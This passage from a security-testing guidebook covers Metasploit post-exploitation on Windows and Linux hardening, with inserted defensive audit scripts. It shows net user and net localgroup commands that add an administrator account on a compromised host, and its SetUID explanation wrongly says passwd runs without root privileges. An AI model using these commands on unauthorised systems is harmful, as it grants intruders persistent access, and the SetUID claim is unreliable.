In this ironic example, a Mac is running Windows via the Boot Camp software. I now "own" the system and am able to do whatever I want. For example, one thing I commonly do is add a user account to the exploited system. You can actually do this within Metasploit (via the adduser payloads), but I prefer to do it on my own so I can get screenshots of my actions. To add a user, simply enter net user username password /add at the Metasploit command prompt.
Next, I add the user to the local administrators group by entering net localgroup administrators username /add at the Metasploit command prompt. You can then log in to the remote system by mapping a drive to the C$ share or by connecting via Remote Desktop.
If you choose to add a user account during this phase, be sure to remove it when you finish. Otherwise, you can create another vulnerability on the system — especially if the account has a weak password. Chapter 3 covers related issues, such as the need for a contract when performing your testing. You want to make sure you've covered yourself.
All in all, this is hacking at its finest!
Three unique versions of Metasploit are available from Rapid7. The free edition outlined in the preceding steps is called Metasploit Framework. It may be all you need if an occasional screenshot of remote access or similar is sufficient for your testing purposes. There's also Metasploit Community, which is accessible via a web user interface and intended for small networks. Finally, there's a full-blown commercial version called Metasploit Pro for the serious security professional. Metasploit Pro adds features for social engineering, web application scanning, and detailed reporting.
Metasploit Pro's Overview screen is shown in Figure 12-14. Note the workflow features in the Quick Start Wizards icons including Quick PenTest, Phishing Campaign, and Web App Test. It's a well-thought-out interface that takes the pain out of traditional security scanning, exploitation, and reporting, which is especially useful for the less technical IT professional.
Figure 12-14: Metasploit Pro's graphical interface provides broad security testing capabilities including phishing and web application security checks.
Metasploit Pro provides you with the ability to import scanner findings (typically XML files) from third-party vulnerability scanners such as Acunetix Web Vulnerability Scanner, Netsparker, and Nexpose. Simply click the name of your project in the Project Listing section (or create a new one by selecting New Project) and then click the Import button. After the scan data file is imported, you can click the Vulnerabilities tab and see all the original vulnerability scanner findings. To exploit one of the vulnerabilities (assuming it's a supported exploit in Metasploit Pro), simply click the finding under the Name column and you'll be presented with a new page that allows you to click Exploit and execute the flaw, as shown in Figure 12-15.
Figure 12-15: Starting the exploit process in Metasploit Pro is as simple as importing your scanner findings and clicking Exploit.
Keep in mind that I've demonstrated only a fraction of what Metasploit Framework and Metasploit Pro can do. I highly recommend you download one or both and familiarize yourself with these tools. Numerous resources are available at www.metasploit.com/help that can help you take your skill set to the next level. The power of Metasploit is unbelievable all by itself. Combine it with the exploit code that's continually updated at sites such as Offensive Security's Exploits Database (www.exploit-db.com), and you have practically everything you need if you choose to drill down to that level of exploitation in your security testing.
Countermeasures against missing patch vulnerability exploits
Patch your systems — both the Windows OS and any Microsoft or third-party applications running on them. I know it's a lot easier said than done. Seriously, that's all there is to it. Combine that with the other hardening recommendations I provide in this chapter, and you have a pretty darned secure Windows environment.
To get your arms around the patching process, you have to automate it wherever you can. You can use Windows Update — or better yet — Windows Server Update Services (WSUS) for Microsoft-centric patches, which can be found at http://technet.microsoft.com/en-us/wsus/default.aspx. I can't stress enough how you need to get your third-party patches for Adobe, Java, and so on under control. If you're looking for a commercial alternative, check out GFI LanGuard's patch management features (www.gfi.com/products-and-solutions/network-security-solutions/gfi-languard) and Lumension Patch and Remediation (www.lumension.com/vulnerability-management/patch-management-software.aspx). I cover patching more in-depth in Chapter 18.
Running Authenticated Scans
Another test you can run against your Windows systems is an "authenticated" scan — essentially looking for vulnerabilities as a trusted user. I find these types of tests to be very beneficial because they often highlight system problems and even operational security weaknesses (such as poor change management processes, weak patch management, and lack of information classification) that would never be discovered otherwise.
A trusted insider who has physical access to your network and the right tools can exploit vulnerabilities even more easily. This is especially true if no internal access control lists or IPS is in place and/or a malware infection occurs.
A way to look for Windows weaknesses while you're logged in (that is, through the eyes of a malicious insider) is by using some of the vulnerability scanning tools I've mentioned, such as LanGuard and Nexpose. Figure 12-16 shows the nice (and rare) feature that Nexpose has to test your login credentials before getting vulnerability scans started. Being able to validate login credentials before you start your scans can save an amazing amount of time, hassle, and money.
Figure 12-16: Testing login credentials before running an authenticated scan with Nexpose to see what trusted insiders can see and exploit.
I recommend running authenticated scans as a domain or local administrator. This will show you the greatest amount of security flaws as well as who has access to what in the event that a vulnerability is present. You'll likely be surprised to find out that a large portion of vulnerabilities, such as those listed in Figure 12-16, are accessible via a standard user account. You don't necessarily need to run authenticated scans every time you test for security flaws, but doing so at least once or twice per year is not a bad idea.
You can also use Microsoft Baseline Security Analyzer (MBSA) to check for basic vulnerabilities and missing patches. MBSA is a free utility from Microsoft that you can download at www.microsoft.com/technet/security/tools/mbsahome.mspx. MBSA checks all Windows XP and later (Windows 10 is not yet supported) operating systems for missing patches. It also tests Windows, SQL Server, Office, and IIS for basic security settings, such as weak passwords. You can use these tests to identify security weaknesses in your systems.
With MBSA, you can scan either the local system you're logged into or computers across the network. One caveat: MBSA requires an administrator account on the local machines you're scanning.
Linux
In This Chapter
Examining Linux hacking tools
Port scanning Linux hosts
Gleaning Linux information without logging in
Exploiting common vulnerabilities when logged in to Linux
Minimizing Linux security risks
Linux hasn't made inroads onto the enterprise desktop the way that Windows has, but Linux still has its presence in practically every network nonetheless. A common misconception is that Linux is more secure than Windows. However, more and more, Linux and its sister variants of UNIX are prone to some of the same types of security vulnerabilities, so you can't let your guard down.
Hackers are attacking Linux in droves because of its popularity and growing usage in today's network environment. Because some versions of Linux are free — in the sense that you don't have to pay for the base operating system — many organizations are installing Linux for their web servers and e-mail servers in hopes of saving money and having a more secure system. Linux has grown in popularity for other reasons as well, including the following:
Abundant resources are available, including books, websites, and developer and consultant expertise.
There's a lower risk that Linux will be hit with as much malware as Windows and its applications have to deal with. Linux excels when it comes to security, but it probably won't stay that way.
There has been increased buy-in from other UNIX vendors, including IBM, HP, and Oracle.
UNIX and Linux have become increasingly easier to use.
Workstation operating systems such as Mac OS X and Chrome OS are becoming mainstream in business today. These OSs are based on UNIX/Linux cores and are susceptible to many of the Linux flaws I discuss in this chapter. Therefore, they need to be included in the scope of your security tests.
In my own security assessment work, I'm not seeing many glaring Chrome OS-based vulnerabilities (yet), but I am seeing weaknesses in Mac OS X, especially as it involves third-party software that can be exploited by malware and even tools such as Metasploit. I see such flaws more often when performing authenticated scans, so make sure you're doing those as well.
Based on what I see in my work, Linux is less vulnerable to common security flaws — especially as it relates to missing third-party patches for Adobe, Java, and the like — than Windows. When comparing any current distribution of Linux, such as Ubuntu and Red Hat/Fedora, with Windows 7 or Windows 10, I tend to find more weaknesses in the Windows systems. Chalk it up to widespread use, more features, or uneducated users, but there seems to be a lot more that can happen in a Windows environment. That said, Linux is certainly not flawless. In addition to the password attacks I cover in Chapter 8, certain remote and local attacks are possible against Linux-based systems. In this chapter, I show you some security issues in the Linux operating system and outline some countermeasures to plug the holes so you can keep the bad guys out. Don't let the title of this chapter fool you — a lot of this information applies to all flavors of UNIX.
Understanding Linux Vulnerabilities
Vulnerabilities and attacks against Linux are creating business risks in a growing number of organizations — especially e-commerce companies, network and IT/security vendors, and cloud service providers that rely on Linux for many of their systems, including their own products. When Linux systems are hacked, the victim organizations can experience the same side effects as their Windows-using counterparts, including:
Leakage of sensitive information
Cracked passwords
Corrupted or deleted databases
Systems taken completely offline
Choosing Tools
You can use many Linux-based security tools to test your Linux systems. Some are much better than others. I often find that my Windows-based commercial tools do as good a job as any. My favorites are as follows:
Kali Linux (www.kali.org) toolset on a bootable DVD or .iso image file
LanGuard (www.gfi.com/products-and-solutions/network-security-solutions/gfi-languard) for port scanning, OS enumeration, and vulnerability testing
NetScanTools Pro (www.netscantools.com) for port scanning, OS enumeration, and much more
Nexpose (www.rapid7.com/products/nexpose) for detailed port scanning, OS enumeration, and vulnerability testing
A tool such as Nexpose can perform the majority of the security testing needed to find flaws in Linux. Another popular commercial alternative is offered by Qualys (www.qualys.com).
Nmap (https://nmap.org) for OS fingerprinting and detailed port scanning
Nessus (www.tenable.com/products/nessus-vulnerability-scanner) for OS fingerprinting, port scanning, and vulnerability testing
Many other Linux hacking and testing tools are available on such sites as SourceForge.net (http://sourceforge.net) and freecode.com (http://freecode.com). The key is to find a set of tools — preferably as few as possible — that can do the job that you need to do and that you feel comfortable working with.
Gathering Information About Your Linux Vulnerabilities
You can scan your Linux-based systems and gather information from both outside (if the system is a publicly-accessible host) and inside your network. That way, you can see what the bad guys see from both directions.
System scanning
Linux services — called daemons — are the programs that run on a system and serve up various services and applications for users.
Internet services, such as the Apache web server (httpd), telnet (telnetd), and FTP (ftpd), often give away too much information about the system, including software versions, internal IP addresses, and usernames. This information could allow hackers to exploit a known weakness in the system. TCP and UDP small services, such as echo, daytime, and chargen, are often enabled by default and don't need to be.
The vulnerabilities inherent in your Linux systems depend on what services are running. You can perform basic port scans to glean information about what's running.
The NetScanTools Pro results in Figure 13-1 show many potentially vulnerable services on this Linux system, including the confirmed services of SSH, HTTP, and HTTPS.
Figure 13-1: Port scanning a Linux host with NetScanTools Pro.
In addition to NetScanTools Pro, you can run another scanner, such as Nexpose, against the system to try to gather more information, including a server running SSL version 3 with weak encryption ciphers, as shown in Figure 13-2.
Figure 13-2: Using Nexpose to discover vulnerabilities with SSL.
Keep in mind that you're going to find the most vulnerabilities in Linux and Mac OS X by performing authenticated vulnerability scans. This is particularly important to do because it shows you what's exploitable by users — or malware — on your systems. And, yes, even Linux and Mac OS X are susceptible to malware! You'll want to run such scans at least once per year or after any major application or OS upgrades on your workstations and servers.
Figure 13-3 shows the absolutely amazing feature in Nexpose that allows you to actually test your login credentials before kicking off a vulnerability scan of your network.
Figure 13-3: Using the Test Credentials feature as part of the Nexpose scan configuration.
What's the big deal about this feature, you say? Well, first off, it can be a whole lot of hassle to think you're entering the proper login credentials into the scanner only to find out hours later that the logins were not successful, which can invalidate the scan you ran. It can also be a threat to your budget (or wallet, if you work for yourself) if you're charged by the scan only to discover that you have to re-scan hundreds, even thousands, of network hosts. I've been down that road many times and it's a real pain, to say the least.
You can use free tools to go a step further and find out the exact distribution and kernel version by running an OS fingerprint scan with the Nmap command nmap -sV -O, as shown in Figure 13-4.
Figure 13-4: Using Nmap to determine the OS kernel version of a Linux server.
The Windows-based NetScanTools Pro also has the capability to determine the version of Linux that's running, as shown in Figure 13-5.
Figure 13-5: Using NetScanTools Pro to determine that Slackware Linux is likely running.
Countermeasures against system scanning
Although you can't completely prevent system scanning, you can still implement the following countermeasures to keep the bad guys from gleaning too much information about your systems and using it against you somehow:
Protect the systems with either:
A firewall, such as iptables, that's built into the OS
A host-based intrusion prevention system, such as PortSentry (http://sourceforge.net/projects/sentrytools), a local agent such as Snare (www.intersectalliance.com/our-product/snare-agent), or McAfee Host Intrusion Prevention for Server (www.mcafee.com/us/products/host-ips-for-server.aspx) that ties into a larger security incident and event management (SIEM) system that monitors for and correlates network events, anomalies, and breaches.
Disable the services you don't need, including RPC, HTTP, FTP, telnet, and the small UDP and TCP services — anything for which you don't have a true business need. This keeps the services from showing up in a port scan, which gives an attacker less information — and presumably less incentive — to break into your system.
Make sure the latest software updates are installed to reduce the chance of exploitation if an attacker determines what services you're running.
Finding Unneeded and Unsecured Services
When you know which daemons and applications are running—such as FTP, telnet, and a web server—it’s nice to know exactly which versions are running so you can look up their associated vulnerabilities and decide whether to turn them off. The National Vulnerability Database site (http://nvd.nist.gov) is a good resource for looking up vulnerabilities.
Searches
Several security tools can help uncover vulnerabilities in your Linux systems. These tools might not identify all applications down to the exact version number, but they’re a very powerful way of collecting system information.
Vulnerabilities
Be especially mindful of these common security weaknesses in Linux systems:
Anonymous FTP—especially if it isn’t properly configured—can provide a way for an attacker to download and access files on your system.
Telnet and FTP are vulnerable to network analyzer captures of the cleartext user ID and password the applications use. Their logins can also be brute-forced.
Old versions of sendmail and OpenSSL have many security issues, including denial of service flaws that can take systems offline.
R-services, such as rlogin, rdist, rexecd, rsh, and rcp, are especially vulnerable to attacks that rely on trust.
Many web servers run on Linux, so you can’t overlook the importance of checking for weaknesses in Apache as well as Tomcat or other applications. For example, a common Linux vulnerability is that usernames can be determined via Apache when it doesn’t have the UserDir directive disabled in its httpd.conf file. You can exploit this weakness manually by browsing to well-known user folders, such as http://www.your_site.com/~user_name or, better yet, by using a vulnerability scanner, such as AppSpider (www.rapid7.com/products/appspider) or Nexpose, to automatically enumerate the system. Either way, you may be able to find out which Linux users exist and then launch a web password cracking attack. There are also ways to access system files (including /etc/passwd) via vulnerable CGI and PHP code. I cover hacking web applications in Chapter 15.
Likewise, FTP is often running unsecured on Linux systems. I’ve found Linux systems with anonymous FTP enabled that were sharing sensitive healthcare and financial information to everyone on the local network. Talk about a lack of accountability! So, don’t forget to look for the simple stuff. When testing Linux, you can dig down deep into the kernel and do this or that to carry out some uber-complex exploit, but it’s usually the little things that get you. I’ve said it before, and it deserves mentioning again: look for the low-hanging fruit on your network, as that is the stuff that will get you into the most trouble the quickest.
Anonymous FTP is one of the most common vulnerabilities I find in Linux. If you must run an FTP server, make sure it’s not sharing out sensitive information to all of your internal network users, or worse, the entire world. In my work, I see the former quite often and the latter periodically, which is more than I ever should.
Tools
The following tools can gather more in-depth information beyond port scanning to enumerate your Linux systems and see what others see:
Nmap can check for specific versions of the services loaded, as shown in Figure 13-6. Simply run Nmap with the -sV command-line switch.
netstat shows the services running on a local machine. Enter this command while logged in:
netstat -anp
List Open Files (lsof) displays processes that are listening and files that are open on the system.
To run lsof, log in and enter this command at a Linux command prompt: lsof. There are tons of options available via lsof -h, such as lsof -i +D /var/log to show which log files are currently in use over which network connections. The lsof command can come in handy when you suspect that malware has found its way onto the system.
Figure 13-6: Using Nmap to check application versions.
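The point of running netstat on your own hosts is to compare what is actually listening with what you expect to be listening. The following is an added example, not code from the book: it parses the output of netstat -anp (the sample output below is constructed, not captured from a real host), keeps only listening TCP sockets and bound UDP sockets, and reports the ones bound to a non-loopback address that are not on an allowlist you maintain.

```python
# Added example (not from the book): inventory of listening services taken
# from "netstat -anp" output and compared against an allowlist of expected
# (protocol, port) pairs. The sample output is constructed.
from typing import Dict, List, Set, Tuple

SAMPLE_NETSTAT = """\
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      646/sshd
tcp        0      0 127.0.0.1:25            0.0.0.0:*               LISTEN      812/master
tcp        0      0 0.0.0.0:21              0.0.0.0:*               LISTEN      901/vsftpd
tcp6       0      0 :::80                   :::*                    LISTEN      1023/httpd
tcp        0      0 10.0.0.5:22             10.0.0.9:51234          ESTABLISHED 700/sshd: jsmith
udp        0      0 0.0.0.0:111             0.0.0.0:*                           455/rpcbind
Active UNIX domain sockets (servers and established)
unix  2      [ ACC ]     STREAM     LISTENING     12345    1/systemd            /run/systemd/private
"""

LOOPBACK = {"127.0.0.1", "::1"}


def listening_sockets(netstat_output: str) -> List[Dict[str, object]]:
    """One record per listening TCP socket or bound UDP socket."""
    records = []
    for line in netstat_output.splitlines():
        fields = line.split()
        if len(fields) < 6 or not fields[0].startswith(("tcp", "udp")):
            continue  # headers, blank lines and UNIX-domain sockets
        proto, local = fields[0], fields[3]
        if proto.startswith("tcp"):
            if fields[5] != "LISTEN":
                continue  # established/closing connections are not services
            pid_prog = " ".join(fields[6:])
        else:
            pid_prog = " ".join(fields[5:])  # UDP rows have no State column
        addr, port = local.rsplit(":", 1)
        pid, _, program = pid_prog.partition("/")
        records.append({
            "proto": proto.rstrip("6"),          # tcp6 -> tcp
            "addr": addr,
            "port": int(port),
            "pid": int(pid) if pid.isdigit() else None,
            "program": program or "unknown",     # "-" when netstat lacks rights
            "exposed": addr not in LOOPBACK,     # reachable from the network
        })
    return records


def unexpected_services(netstat_output: str,
                        allowlist: Set[Tuple[str, int]]) -> List[Tuple[str, int, str]]:
    """Network-reachable listeners that are not on the allowlist."""
    return [(r["proto"], r["port"], r["program"])
            for r in listening_sockets(netstat_output)
            if r["exposed"] and (r["proto"], r["port"]) not in allowlist]


if __name__ == "__main__":
    # Only SSH is expected on this (constructed) host.
    for proto, port, program in unexpected_services(SAMPLE_NETSTAT, {("tcp", 22)}):
        print(f"unexpected listener {proto}/{port} ({program})")
```

Run it against real output with `netstat -anp | python3 inventory.py`-style piping by replacing SAMPLE_NETSTAT with sys.stdin.read(); anything it reports is a candidate for the "disable the services you don't need" countermeasure below. The loopback-only SMTP listener is deliberately not reported, since it is not exposed to the network.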
Countermeasures against attacks on unneeded services
You can and should disable the unneeded services on your Linux systems. This is one of the best ways to keep your Linux system secure. Like reducing the number of entry points (such as open doors and windows) into your house, the more entry points you eliminate, the fewer places an intruder can break in.
Disabling unneeded services
The best method of disabling unneeded services depends on whether the daemon is loaded in the first place. You have several places to disable services, depending on the version of Linux you’re running.
If you don’t need to run a particular service, take the safe route: Turn it off! Just give people on the network ample warning that it’s going to happen in the event someone needs the service for their work.
inetd.conf (or xinetd.conf)
If it makes good business sense—that is, if you don’t need them—disable unneeded services by commenting out the loading of daemons you don’t use. Follow these steps:
1. Enter the following command at the Linux prompt: ps -aux
The process ID (PID) for each daemon, including inetd, is listed on the screen. In Figure 13-7, the PID for the sshd (Secure Shell daemon) is 646.
2. Make note of the PID for inetd.
3. Open /etc/inetd.conf in the Linux text editor vi by entering the following command: vi /etc/inetd.conf
Or /etc/xinetd.conf
4. When you have the file loaded in vi, enable the insert (edit) mode by pressing I.
5. Move the cursor to the beginning of the line of the daemon that you want to disable, such as httpd (web server daemon), and type # at the beginning of the line.
This step comments out the line and prevents it from loading when you reboot the server or restart inetd. It’s also good for record keeping and change management.
6. To exit vi and save your changes, press Esc to exit the insert mode, type :wq, and then press Enter.
This tells vi that you want to write your changes and quit.
7. Restart inetd by entering this command with the inetd PID: kill -HUP PID
Figure 13-7: Viewing the process IDs for running daemons by using ps -aux.
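The steps above are the manual edit. When you have more than a handful of hosts, the same change is easier to review and repeat as a text transformation. The following is an added example, not code from the book: it lists the services still enabled in an inetd.conf-style file, comments out the ones you name (the same # convention as step 5), and flips disable = no to disable = yes in an /etc/xinetd.d service file. Both sample files are constructed; write the result back and send inetd the HUP signal yourself, as in step 7.

```python
# Added example (not from the book): disabling inetd/xinetd services as a
# reviewable text transformation. Sample files are constructed.
import re
from typing import List, Tuple

SAMPLE_INETD_CONF = """\
# <service_name> <sock_type> <proto> <flags> <user> <server_path> <args>
ftp     stream  tcp     nowait  root    /usr/sbin/tcpd  in.ftpd -l -a
telnet  stream  tcp     nowait  root    /usr/sbin/tcpd  in.telnetd
#shell   stream  tcp     nowait  root    /usr/sbin/tcpd  in.rshd
login   stream  tcp     nowait  root    /usr/sbin/tcpd  in.rlogind
exec    stream  tcp     nowait  root    /usr/sbin/tcpd  in.rexecd
"""

SAMPLE_XINETD_REXEC = """\
service exec
{
        disable = no
        socket_type     = stream
        wait            = no
        user            = root
        server          = /usr/sbin/in.rexecd
}
"""


def enabled_services(inetd_conf: str) -> List[str]:
    """Service names whose lines are not commented out."""
    names = []
    for line in inetd_conf.splitlines():
        stripped = line.strip()
        if stripped and not stripped.startswith("#"):
            names.append(stripped.split()[0])
    return names


def disable_inetd_services(inetd_conf: str, services: List[str]) -> Tuple[str, List[str]]:
    """Comment out every active line for the named services.

    Returns the new file text plus the services actually changed, so a caller
    can tell a no-op (already disabled or absent) from a real change.
    """
    wanted = set(services)
    out, changed = [], []
    for line in inetd_conf.splitlines():
        fields = line.split()
        if fields and not line.lstrip().startswith("#") and fields[0] in wanted:
            out.append("#" + line)          # same convention as editing in vi
            changed.append(fields[0])
        else:
            out.append(line)
    return "\n".join(out) + "\n", changed


def disable_xinetd_service(xinetd_file: str) -> str:
    """Set "disable = yes" in an /etc/xinetd.d service file (idempotent)."""
    text, count = re.subn(r"(?m)^(\s*disable\s*=\s*)no\b", r"\1yes", xinetd_file)
    if count == 0 and not re.search(r"(?m)^\s*disable\s*=\s*yes\b", text):
        # No disable line at all: add one right after the opening brace.
        text = text.replace("{\n", "{\n        disable = yes\n", 1)
    return text


if __name__ == "__main__":
    new_conf, changed = disable_inetd_services(SAMPLE_INETD_CONF, ["login", "exec", "shell"])
    print("disabled:", changed, "still enabled:", enabled_services(new_conf))
    print(disable_xinetd_service(SAMPLE_XINETD_REXEC))
```

The returned list of changed services is what you would record for change management; an empty list tells you the file already matched the intended state.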
chkconfig
If you don’t have an inetd.conf file (or it’s empty), your version of Linux is probably running the xinetd program—a more secure replacement for inetd—to listen for incoming network application requests. You can edit the /etc/xinetd.conf file if this is the case. For more information on the usage of xinetd and xinetd.conf, enter man xinetd or man xinetd.conf at a Linux command prompt. If you’re running Red Hat 7.0 or later, you can run the /sbin/chkconfig program to turn off the daemons you don’t want to load.
You can also enter chkconfig --list at a command prompt to see what services are enabled in the xinetd.conf file.
If you want to disable a specific service, say snmp, enter the following: chkconfig --del snmpd
You can use the chkconfig program to disable other services, such as FTP, telnet, and web server.
Access control
TCP Wrappers can control access to critical services that you run, such as FTP or HTTP. This program controls access for TCP services and logs their usage, helping you control access via hostname or IP address and track malicious activities.
You can find more information about TCP Wrappers from ftp://ftp.porcupine.org/pub/security/index.html.
Always make sure that your operating system and the applications running on it are not open to the world (or your internal network where that might matter) by ensuring that reasonable password requirements are in place. Don’t forget to disable anonymous FTP unless you absolutely need it. Even if you do, limit system access to only those with a business need to access sensitive information.
Securing the .rhosts and hosts.equiv Files
Linux—and all the flavors of UNIX—are file-based operating systems. Practically everything that’s done on the system involves the manipulation of files. This is why so many attacks against Linux are at the file level.
Hacks using the hosts.equiv and .rhosts files
If hackers can capture a user ID and password by using a network analyzer or can crash an application and gain root access via a buffer overflow, one thing they look for is what users are trusted by the local system. That’s why it’s critical to assess these files yourself. The /etc/hosts.equiv and .rhosts files list this information.
hosts.equiv
The /etc/hosts.equiv file won’t give away root access information, but it does specify which accounts on the system can access services on the local host. For example, if tribe were listed in this file, all users on the tribe system would be allowed access. As with the .rhosts file, external hackers can read this file and then spoof their IP address and hostname to gain unauthorized access to the local system. Attackers can also use the names located in the .rhosts and hosts.equiv files to look for names of other computers to exploit.
.rhosts
The highly important $home/.rhosts files in Linux specify which remote users can access the Berkeley Software Distribution (BSD) r-commands (such as rsh, rcp, and rlogin) on the local system without a password. This file is in a specific user’s (including root) home directory, such as /home/jsmith. A .rhosts file may look like this:
tribe scott
tribe eddie
This file allows users Scott and Eddie on the remote system tribe to log in to the local host with the same privileges as the local user. If a plus sign (+) is entered in the remote-host and user fields, any user from any host could log in to the local system. The hacker can add entries into this file by using either of these tricks:
Manually manipulating the file
Running a script that exploits an unsecured Common Gateway Interface (CGI) script on a web-server application that’s running on the system
This configuration file is a prime target for a malicious attack. On most Linux systems I’ve tested, these files aren’t enabled by default. However, a user can create one in his or her home directory on the system—intentionally or accidentally—which can create a major security hole on the system.
Countermeasures against .rhosts and hosts.equiv file attacks
Use both of the following countermeasures to prevent hacker attacks against the .rhosts and hosts.equiv files in your Linux system.
Disabling commands
A good way to prevent abuse of these files is to disable the BSD r-commands. This can be done in two ways:
Comment out the lines starting with shell, login, and exec in inetd.conf.
Edit the rexec, rlogin, and rsh files located in the /etc/xinetd.d directory. Open each file in a text editor and change disable=no to disable=yes, as shown in Figure 13-8.
Figure 13-8: The rexec file showing the disable option.
In Red Hat Enterprise Linux, you can disable the BSD r-commands with the setup program:
1. Enter setup at a command prompt.
2. Enter system-config-services.
3. Select the appropriate services and click Disable.
Blocking access
A couple of countermeasures can block rogue access of the .rhosts and hosts.equiv files:
Block spoofed addresses at the firewall, as I outline in Chapter 9.
Set the read permissions for each file’s owner only.
.rhosts: Enter this command in each user’s home directory:
chmod 600 .rhosts
hosts.equiv: Enter this command in the /etc directory: chmod 600 hosts.equiv
You can also use Open Source Tripwire (http://sourceforge.net/projects/tripwire) to monitor these files and alert you when access is obtained or changes are made.
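Assessing these files yourself means two checks: whether any entry widens trust beyond a named user on a named host (the + wildcard, or a host with no user), and whether the file mode is still 600. The following is an added example, not code from the book, that performs both checks; it writes constructed sample files into a temporary directory so it can run without touching a real home directory. Point audit_trust_file at a real path to use it for real.

```python
# Added example (not from the book): audit .rhosts / hosts.equiv contents and
# permissions. Sample files are constructed in a temporary directory.
import os
import stat
import tempfile
from typing import Dict, List, Tuple


def trust_entries(text: str) -> List[Tuple[str, str]]:
    """Parse 'host [user]' lines; comments and blank lines are skipped."""
    entries = []
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line:
            continue
        fields = line.split()
        entries.append((fields[0], fields[1] if len(fields) > 1 else ""))
    return entries


def risky_entries(text: str) -> List[str]:
    """Findings that follow from the file contents alone."""
    findings = []
    for host, user in trust_entries(text):
        if host == "+" and user in ("", "+"):
            findings.append("any user on any host is trusted ('+' wildcard)")
        elif host == "+":
            findings.append(f"user {user!r} is trusted from any host")
        elif user == "+":
            findings.append(f"every user on host {host!r} is trusted")
        elif user == "":
            findings.append(f"all users on {host!r} are trusted (no user restriction)")
    return findings


def audit_trust_file(path: str) -> List[str]:
    """Permission check (must be owner-only, i.e. chmod 600) plus content findings."""
    findings = []
    st = os.stat(path)
    if st.st_mode & 0o077:                      # any group/other bit set
        findings.append(f"mode {stat.filemode(st.st_mode)} is not owner-only (chmod 600)")
    with open(path, encoding="utf-8", errors="replace") as fh:
        findings.extend(risky_entries(fh.read()))
    return findings


def make_sample_files() -> Dict[str, str]:
    """Write constructed samples to a temp dir; returns name -> path."""
    directory = tempfile.mkdtemp(prefix="trust-audit-")
    samples = {
        ".rhosts": ("tribe scott\ntribe eddie\n+ +\n", 0o644),   # wildcard, readable by all
        "hosts.equiv": ("tribe\n# finance-db jsmith\n", 0o600),  # host-only entry, locked down
    }
    paths = {}
    for name, (content, mode) in samples.items():
        path = os.path.join(directory, name)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(content)
        os.chmod(path, mode)
        paths[name] = path
    return paths


if __name__ == "__main__":
    for name, path in make_sample_files().items():
        print(name, audit_trust_file(path) or ["ok"])
```

A host-only line such as tribe in hosts.equiv is reported as well, because it trusts every account on that host, which is exactly what the text above warns about; the fix is still to disable the r-commands rather than to curate these files.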
Assessing the Security of NFS
The Network File System (NFS) is used to mount remote file systems (similar to shares in Windows) from the local machine. Given the remote access nature of NFS, it certainly has its fair share of hacks. I cover additional storage vulnerabilities and hacks in Chapter 16.
NFS hacks
If NFS was set up improperly or its configuration has been tampered with—namely, the /etc/exports file containing a setting that allows the world to read the entire file system—remote hackers can easily obtain remote access and do anything they want on the system. Assuming no access control list (ACL) is in place, all it takes is a line, such as the following, in the /etc/exports file:
/ rw
This line says that anyone can remotely mount the root partition in a read-write fashion. Of course, the following conditions must also be true:
The NFS daemon (nfsd) must be running, along with the portmap daemon that would map NFS to RPC.
The firewall must allow the NFS traffic through.
The remote systems that are allowed into the server running the NFS daemon must be placed into the /etc/hosts.allow file.
This remote-mounting capability is easy to misconfigure. It’s often related to a Linux administrator’s misunderstanding of what it takes to share out the NFS mounts and resorting to the easiest way possible to get it working. If someone can gain remote access, the system is theirs.
Countermeasures against NFS attacks
The best defense against NFS hacking depends on whether you actually need the service running.
If you don’t need NFS, disable it. If you need NFS, implement the following countermeasures:
Filter NFS traffic at the firewall—typically, UDP port 111 (the portmapper port) if you want to filter all RPC traffic.
Add network ACLs to limit access to specific hosts.
Make sure that your /etc/exports and /etc/hosts.allow files are configured properly to keep the world outside your network.
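Checking that /etc/exports is "configured properly" comes down to reading each path/client pair and asking who can mount it and with what rights. The following is an added example, not code from the book: a small parser for the exports file that reports shares exported to every client, read-write exports, no_root_squash, and the bare-word form shown above (/ rw). The sample file is constructed; a space between a hostname and its (options), a classic mistake, is included on purpose.

```python
# Added example (not from the book): parse /etc/exports and report entries
# that widen access beyond specific hosts. Sample file is constructed.
from typing import Dict, List, Set, Tuple

# Option keywords; a bare one with no parentheses is the legacy form "/ rw".
OPTION_WORDS = {"rw", "ro", "sync", "async", "root_squash", "no_root_squash",
                "all_squash", "secure", "insecure"}

SAMPLE_EXPORTS = """\
# constructed /etc/exports, not from a real server
/home/shared   10.0.0.0/24(ro,sync)
/srv/backup    backup.example.internal(rw,sync,root_squash)
/              *(rw,no_root_squash)
/var/www       www1.example.internal (rw)
/data          rw
"""


def parse_exports(text: str) -> List[Dict[str, object]]:
    """One record per (path, client) pair, in file order."""
    records = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        path, *specs = line.split()
        if not specs:
            specs = ["()"]                 # no client list at all: everyone, defaults
        for spec in specs:
            host, paren, rest = spec.partition("(")
            options: Set[str] = set(rest.rstrip(")").split(",")) - {""} if paren else set()
            records.append({
                "path": path,
                "host": host,              # "" or "*" means every client
                "options": options,
                "legacy": not paren and host in OPTION_WORDS,
            })
    return records


def risky_exports(text: str) -> List[Tuple[str, str]]:
    """(path, finding) pairs for entries worth reviewing."""
    findings = []
    for r in parse_exports(text):
        path, host, opts = r["path"], r["host"], r["options"]
        if r["legacy"]:
            findings.append((path, f"bare token {host!r}: modern exportfs treats a bare word "
                                   "as a client name; use host(options) syntax and confirm "
                                   "with exportfs -v"))
            continue
        if host in ("", "*"):
            mode = "read-write" if "rw" in opts else "read-only"
            findings.append((path, f"exported {mode} to every client"))
        if "no_root_squash" in opts:
            findings.append((path, f"no_root_squash for {host or '*'}: remote root keeps "
                                   "root on this share"))
    return findings


if __name__ == "__main__":
    for path, finding in risky_exports(SAMPLE_EXPORTS):
        print(f"{path}: {finding}")
```

Note the /var/www line: because of the space, www1.example.internal gets default (read-only) access and the separate (rw) token exports the share read-write to everyone, which is why the parser reports it even though a host name appears on the line.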
Checking File Permissions
In Linux, special file types allow programs to run with the file owner’s rights:
SetUID (for user IDs)
SetGID (for group IDs)
SetUID and SetGID are required when a user runs a program that needs full access to the system to perform its tasks. For example, when a user invokes the passwd program to change his or her password, the program is actually loaded and run without root or any other user’s privileges. This is done so that the user can run the program and the program can update the password database without the root account being involved in the process.
File permission hacks
By default, rogue programs that run with root privileges can be easily hidden. An external attacker or malicious insider might do this to hide hacking files, such as rootkits, on the system. This can be done with SetUID and SetGID coding in their hacking programs.
Countermeasures against file permission attacks
